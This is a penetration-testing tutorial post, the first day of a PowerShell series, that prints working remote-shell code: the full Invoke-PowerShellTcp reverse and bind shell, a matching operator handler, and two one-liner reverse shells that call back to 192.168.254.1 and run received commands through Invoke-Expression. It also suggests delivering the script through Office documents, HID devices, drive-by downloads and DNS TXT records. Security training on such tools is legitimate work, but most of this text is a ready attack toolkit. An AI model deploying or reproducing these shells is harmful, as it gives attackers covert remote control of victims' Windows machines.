One week PowerShell script Day 1: TCP interactive PowerShell script
PowerShell is a common tool for penetration testers. Because it is tightly integrated with Windows, it lets us do a variety of interesting things, and I and other hackers who use PowerShell have spent a lot of time programming in it.
However, during my lectures and training sessions I found that many hackers and defenders do not know what PowerShell can do or how convenient it is. I also met many colleagues who dismissed PowerShell only because it came from Microsoft. To cultivate and spread the use of PowerShell in the industry, I decided to start a one-week PowerShell script tutorial.
Day 1-TCP interactive PowerShell script
Day 2-UDP interactive PowerShell script
Day 3-HTTP/HTTPS interactive PowerShell script
Day 4-WMI interactive PowerShell script
Day 5-ICMP and DNS interactive PowerShell scripts
Without further ado, let's start the first day of the course.
Day 1: TCP interactive PowerShell script
Let's start with a reverse shell. This great script was submitted by Ben Turner (@benpturner) and Dave Hardy (@davehardy20); how to use it with Metasploit is described in their article. After removing some code from that script and modifying other parts, it became the Invoke-PowerShellTcp that I provide. The script can give you either a reverse (connect-back) or a bind (listening) PowerShell. The current source code is as follows (excluding the help documentation; the only change from the page's original listing is that $listener.Stop() is guarded, so reverse mode no longer errors on a null $listener at exit):

function Invoke-PowerShellTcp
{
    [CmdletBinding(DefaultParameterSetName="reverse")] Param(

        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
        [String]
        $IPAddress,

        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
        [Int]
        $Port,

        [Parameter(ParameterSetName="reverse")]
        [Switch]
        $Reverse,

        [Parameter(ParameterSetName="bind")]
        [Switch]
        $Bind
    )

    #Connect back if the reverse switch is used.
    if ($Reverse)
    {
        $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
    }

    #Bind to the provided port if Bind switch is used.
    if ($Bind)
    {
        $listener = [System.Net.Sockets.TcpListener]$Port
        $listener.start()
        $client = $listener.AcceptTcpClient()
    }

    $stream = $client.GetStream()
    #256-byte receive buffer; a command longer than this arrives in several reads.
    [byte[]]$bytes = 0..255|%{0}

    #Send back current username and computername
    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
    $stream.Write($sendbytes,0,$sendbytes.Length)

    #Show an interactive PowerShell prompt
    $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
    $stream.Write($sendbytes,0,$sendbytes.Length)

    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
    {
        $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
        $data = $EncodedText.GetString($bytes,0, $i)

        #Execute the command on the target.
        $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )

        #Append a fresh prompt and the last error, if any, then clear the error stack.
        $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
        $x = ($error[0] | Out-String)
        $error.clear()
        $sendback2 = $sendback2 + $x

        #Return the results
        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
        $stream.Write($sendbyte,0,$sendbyte.Length)
        $stream.Flush()
    }
    $client.Close()
    #Only bind mode has a listener to stop.
    if ($listener)
    {
        $listener.Stop()
    }
}
You can find it in the Shells directory of Nishang: https://github.com/samratashok/nishang/tree/master/Shells
The following shows how to run a listener on Kali Linux:
You can also run a listener on a Windows machine. Use powercat:
Then run Invoke-PowerShellTcp on the target in reverse (connect-back) mode:
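If you would rather not depend on nc or powercat, the listener side can be written in PowerShell as well. The following is an added example of my own, not code from Nishang or from the original post: a handler that serves both modes of Invoke-PowerShellTcp. Without -ConnectTo it listens for a reverse connection; with -ConnectTo it connects to a target that ran the script with -Bind. The port 4444 and the addresses in the comments are assumptions for illustration, and the function name Start-PowerShellTcpHandler is mine.

```powershell
# Added example, not Nishang code: operator-side handler for Invoke-PowerShellTcp.
function Start-PowerShellTcpHandler
{
    [CmdletBinding()]
    param(
        [Parameter(Mandatory = $true)]
        [Int]
        $Port,

        # When set, connect to a target that ran Invoke-PowerShellTcp -Bind -Port $Port
        # instead of waiting for a reverse connection.
        [String]
        $ConnectTo
    )

    $listener = $null
    if ($ConnectTo)
    {
        $client = New-Object System.Net.Sockets.TcpClient($ConnectTo, $Port)
        Write-Host "[+] Connected to bind shell at ${ConnectTo}:$Port"
    }
    else
    {
        $listener = New-Object System.Net.Sockets.TcpListener([System.Net.IPAddress]::Any, $Port)
        $listener.Start()
        Write-Host "[*] Waiting for a reverse shell on TCP port $Port"
        # Blocks until the target runs: Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.1 -Port 4444
        $client = $listener.AcceptTcpClient()
        Write-Host "[+] Connection from $($client.Client.RemoteEndPoint)"
    }

    $stream = $client.GetStream()
    $ascii  = [System.Text.Encoding]::ASCII
    [byte[]]$buffer = New-Object byte[] 65536

    try
    {
        while ($client.Connected)
        {
            # Drain what the target sent: first the banner and prompt, later the
            # command output followed by a fresh prompt. Read() blocks until the
            # first segment arrives; the short sleep plus DataAvailable collects
            # the rest of a burst that TCP split across several segments.
            do
            {
                $n = $stream.Read($buffer, 0, $buffer.Length)
                if ($n -eq 0) { Write-Host "`n[-] Target closed the connection"; return }
                Write-Host -NoNewline ($ascii.GetString($buffer, 0, $n))
                Start-Sleep -Milliseconds 200
            } while ($stream.DataAvailable)

            # The operator types the next command; 'exit' tears the session down locally.
            $command = Read-Host
            if ($command -eq 'exit') { return }

            # The target passes this string straight to Invoke-Expression, so a
            # trailing newline is harmless.
            $payload = $ascii.GetBytes($command + "`n")
            $stream.Write($payload, 0, $payload.Length)
            $stream.Flush()
        }
    }
    finally
    {
        $client.Close()
        if ($listener) { $listener.Stop() }
    }
}

# Reverse mode (assumed operator address 192.168.254.1):
#   operator: Start-PowerShellTcpHandler -Port 4444
#   target:   Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.1 -Port 4444
# Bind mode (assumed target address 192.168.254.50):
#   target:   Invoke-PowerShellTcp -Bind -Port 4444
#   operator: Start-PowerShellTcpHandler -Port 4444 -ConnectTo 192.168.254.50
```

Everything crosses the wire as plain ASCII, as in the script itself, so anything on the path between the two hosts can read and alter the session; the handler is only a convenience for lab use and makes no attempt to fix that.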
Interactive PowerShell helps in many situations. A good example is obtaining a user's plaintext password on Windows 8.1 and Server 2012, where an interactive PowerShell session is required.
Note that we can also use powercat.
The listener you choose depends on your situation.
If you have read the Invoke-PowerShellTcp source carefully, you will have noticed that it is quite short, which makes it easy to combine with other attack techniques: MS Office documents, Human Interface Devices (see Kautilya), drive-by downloads, DNS TXT records and so on. A short script is a good choice in these scenarios. In fact, if you remove the error handling and the parameter handling, it gets even shorter. The following is Invoke-PowerShellTcpOneLine (the listener address 192.168.254.1 is an example):

$client = New-Object System.Net.Sockets.TCPClient("192.168.254.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

If you do not need the prompt, the script can be made even shorter, roughly the length of two Weibo posts:

$sm=(New-Object Net.Sockets.TCPClient("192.168.254.1",55555)).GetStream();[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}